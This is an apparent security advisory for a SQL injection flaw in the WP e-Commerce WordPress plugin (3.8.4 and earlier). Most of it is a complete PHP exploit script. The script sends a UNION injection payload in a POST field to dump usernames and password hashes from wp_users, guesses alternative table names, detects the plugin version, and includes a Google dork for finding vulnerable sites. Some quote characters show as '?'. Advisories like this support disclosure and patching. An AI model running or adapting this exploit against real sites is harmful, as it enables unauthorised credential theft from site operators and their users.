Original Advisory:
http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/
Plain text here:
http://www.ihteam.net/advisories/_561684984189_wp-e-commerce_384_sqli.tar.gz

    <?php
    /*
    WP e-Commerce <= 3.8.4 SQL Injection
    Download link: http://wordpress.org/extend/plugins/wp-e-commerce/
    Author contact: 29/06/2011
    Exploit published: 18/07/2011

    Bugged code (wpsc-theme/functions/wpsc-user_log_functions.php):
    foreach ( (array)$_POST['collected_data'] as $value_id => $value ) {
    $form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE
    `id` = '$value_id' LIMIT 1?;
    $form_data = $wpdb->get_row( $form_sql, ARRAY_A );

    FIX: Upgrade to new version

    Bug found by: IHTeam
    For GetShopped as their security auditors

    This code has been released under the authorization of GetShopped staff.
    It will show user_login and user_pass of wp_users table;

    Google Dork: inurl:page_id= "Your billing/contact details"
    Follow us on Twitter! @IHTeam
    */
    function help() {
    echo "\n";
    echo " -------------------WP e-Commerce <= 3.8.4 SQL
    Injection---------------\n\n";
    echo "    How to use: php wp-ecommerce.php host path page_id
    [table_name]\n\n";
    echo "    host         = Domain name\n";
    echo "    path         = Path of WordPress\n";
    echo "    page_id        = Int value of the login page of WP
    e-commerce\n";
    echo "    table_name    = Default is wp_users\n\n";
    echo "    Example: php wp-commerce.php www.domain.com /wordpress/ 11
    wp_users\n\n";
    echo "
    ----------------------------------------------------------------------\n\n";
    }

    function exploit($host,$path,$pageid,$table) {
    $url = $host.$path."?page_id=".$pageid."&edit_profile=true";
    $buggy_code=urlencode("-2? UNION ALL SELECT 2,
    concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2,
    'billingfirstname', null, 0 from ".$table." WHERE
    '1?='1?);
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_POST, 3);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch,
    CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true");
    $result= curl_exec ($ch);
    curl_close ($ch);

    echo "Now using table name: $table... ";

    preg_match("/<span
    class=\"wpsc_error_msg_field_name\">(.*?)<\/span>.<br \/>/",
    $result, $matches);
    if ( !isset($matches[1]) )
    $msg="Wrong table name or not vulnerable\n";
    else
    $msg="Credential found: ".$matches[1]."\n";

    return $msg;

    }

    if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) {
    if (isset($argv[4]))
    $table = $argv[4];
    else
    $table = "wp_users";

    $host = $argv[1];
    $spos=strpos($host, "http://");
    if(!is_int($spos)&&($spos==0))
    $host="http://$host";

    $path = $argv[2];
    $pageid=(int)$argv[3];

    /* Detecting the version, if possible */
    $version =
    file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt');
    preg_match("/Stable tag: (.*)/", $version, $vmatch);

    if ( !isset($vmatch[1]) )
    $version="Not detectable\n";
    else
    $version=$vmatch[1];

    echo "Version: ".$version."\n";
    /* End of version detecting */

    /* Executing exploit */
    preg_match('/[^.]+\.[^.]+$/', $host, $hmatch);
    $host_name=str_replace('http://',",$hmatch[0]);

    $tarray = array($table, 'wordpress_users', '_users', 'users',
    'wpusers','wordpressusers', $host_name.'_users',
    str_replace('.',",$host_name).'_users',
    str_replace('.',",$host_name).'users' );

    foreach($tarray as $index => $val) {
    echo exploit($host,$path,$pageid,$val);
    }
    /*  End of exploit */
    } else
    help();